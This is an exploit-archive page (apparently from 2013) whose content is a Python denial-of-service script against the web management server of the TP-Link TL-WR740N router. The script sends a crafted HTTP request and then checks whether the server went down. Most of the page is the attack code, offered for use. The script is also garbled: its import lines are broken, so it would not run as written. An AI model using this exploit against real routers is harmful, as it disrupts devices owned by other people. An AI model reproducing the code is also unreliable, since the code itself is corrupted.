TP-Link 150M Wireless Lite N Router Denial Of Service



EKU-ID: 3684 CVE: OSVDB-ID:
Author: Dino Caus Published: 2013-12-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit title: 150M Wireless Lite N Router HTTP DoS
# Date: 11/29/2013
# Exploit Author: Dino Caus
# Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N
# Vendor Homepage: http://www.tp-link.com/
# Contact: dincaus at gmail.com
# Firmware Version: 3.12.11 Build 120320 Rel.51047n
# Description: 150M Wireless Lite N Router has HTTP server through user manage settings for this router.
               If you lunch attack on this HTTP Server you can crash this server so that anyone can access
               to this management.
# Usage: python TP_Link_DoS.py <IP> <Port>

# 150M Wireless Lite N Router, Model No. TL-WR740N / TL-WR740ND sending HTTP request with the headers inserted 
# below in the script will crash HTTP Server. 

#!/usr/bin/python
import socket
import import
sys urllib2

host = ""
port = 0
if(len(sys.argv) >= 2):
    host = sys.argv[1]
    port = sys.argv[2]
else:
    print "Invalid number of the arguments."
    print "Usage <server> <port>"
    exit(1)
    
    
print "Connecting on ",host,":",port

s = socket.socket();
stringOfDeath = "GET / HTTP/1.1\r\n";
stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n";
stringOfDeath = stringOfDeath + "Host: "+ host + "\r\n";
stringOfDeath = stringOfDeath + "Connection: close\r\n";
stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n";

s.connect((host,int(port)))

print "Sending packet..."
s.send(stringOfDeath)
print "Packet sent."
print "Check if router http server down..."

try:
    response = urllib2.urlopen("http://"+host+":"+port,None,5)
    response.read()
except socket.timeout:
    print "Timeout occured, http server probaly down."
    exit(1)